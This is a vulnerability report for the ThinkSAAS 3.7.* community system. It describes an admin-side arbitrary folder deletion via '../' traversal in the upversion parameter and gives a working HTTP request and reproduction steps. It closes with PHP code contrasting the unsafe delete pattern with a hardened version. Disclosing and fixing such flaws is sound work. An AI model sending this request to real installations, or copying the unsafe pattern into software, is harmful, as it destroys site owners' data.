ThinkSAAS is a lightweight open source community system that can be used to build vertical networks.
ThinkSAAS is a simple, highly scalable community development system.
ThinkSAAS can help you quickly develop and build a distinctive online community.
GitHub address: https://github.com/thinksaas/ThinkSAAS
There is an arbitrary folder deletion vulnerability in the backend of ThinkSAAS version 3.7.*. An authenticated administrator can delete any folder on the system with a specially crafted request. Because the input path is not sufficiently validated, a request containing directory traversal sequences (such as ../) bypasses the intended restriction and deletes the targeted directory.
In the file thinksaas/app/system/action/update.php, the delDir function is called to delete the folder, and the upversion parameter used to build that path is attacker-controllable.
Burp Suite request:
GET /index.php?app=system&ac=update&ts=threedo&upversion=../eee HTTP/1.1
Host: www.thinksaas.eek
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.thinksaas.eek/index.php?app=system
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ts_email=admin%40admin.com; ts_autologin=tk7dxep9s0g8wo448o40c40sc8w4ko4
Connection: close
Reproduction steps:
1. Log in to the backend as an administrator.
2. Create a target folder in the root directory.
3. Send the request above with upversion pointing at that folder via a ../ traversal sequence; the folder is deleted.
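The pattern described above, as an added illustration rather than ThinkSAAS's own code: a recursive delete routine (a stand-in for the project's delDir) fed a version string straight from the request, next to a hardened variant that whitelists the version format and confirms the resolved path stays under the intended update directory before deleting. The function names (rrmdir, delDirUnsafe, deleteUpdateDir), the directory layout and the hypothetical base directory are assumptions for the demo.

```php
<?php
// Added example, not ThinkSAAS code. Models the unsafe pattern described above
// (an attacker-controlled version string used to build a directory path that is
// then recursively deleted) and a hardened replacement. All names are hypothetical.

// Recursive directory delete; stand-in for the project's delDir.
function rrmdir(string $dir): void
{
    foreach (scandir($dir) as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $entry;
        if (is_dir($path) && !is_link($path)) {
            rrmdir($path);
        } else {
            unlink($path);
        }
    }
    rmdir($dir);
}

// Unsafe: $upversion comes straight from the request, so "../eee" escapes $base.
function delDirUnsafe(string $base, string $upversion): void
{
    rrmdir($base . '/' . $upversion);
}

// Hardened: whitelist the version format, then verify the resolved path
// is strictly inside $base before deleting anything.
function deleteUpdateDir(string $base, string $upversion): bool
{
    // Only dotted numeric versions such as "3.7.1"; rejects "../eee", "..", "", "a/b".
    if (!preg_match('/^\d+(\.\d+){0,3}$/', $upversion)) {
        return false;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $upversion);
    if ($baseReal === false || $target === false) {
        return false; // base or target does not exist
    }
    // Containment check (defense in depth): target must sit under base.
    if (strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    rrmdir($target);
    return true;
}

// Demo with a constructed temporary layout:
//   $root/update/3.7.1   legitimate update directory
//   $root/eee            sibling folder an attacker would target with "../eee"
$root = sys_get_temp_dir() . '/ts_demo_' . getmypid();
$base = $root . '/update';
mkdir($base . '/3.7.1', 0700, true);
mkdir($root . '/eee', 0700, true);

// Traversal attempt is rejected and the sibling folder survives.
var_dump(deleteUpdateDir($base, '../eee'));
var_dump(is_dir($root . '/eee'));

// A well-formed version inside $base is deleted as intended.
var_dump(deleteUpdateDir($base, '3.7.1'));
var_dump(is_dir($base . '/3.7.1'));

// Swapping in delDirUnsafe($base, '../eee') here would remove $root/eee,
// which is the behaviour the request above exploits.

rrmdir($root); // cleanup
```

The regex does the real work: a version string has no reason to contain a slash, a dot pair or anything outside digits and dots. The realpath containment check is kept as a second layer so that a later relaxation of the format rule cannot silently reopen the traversal.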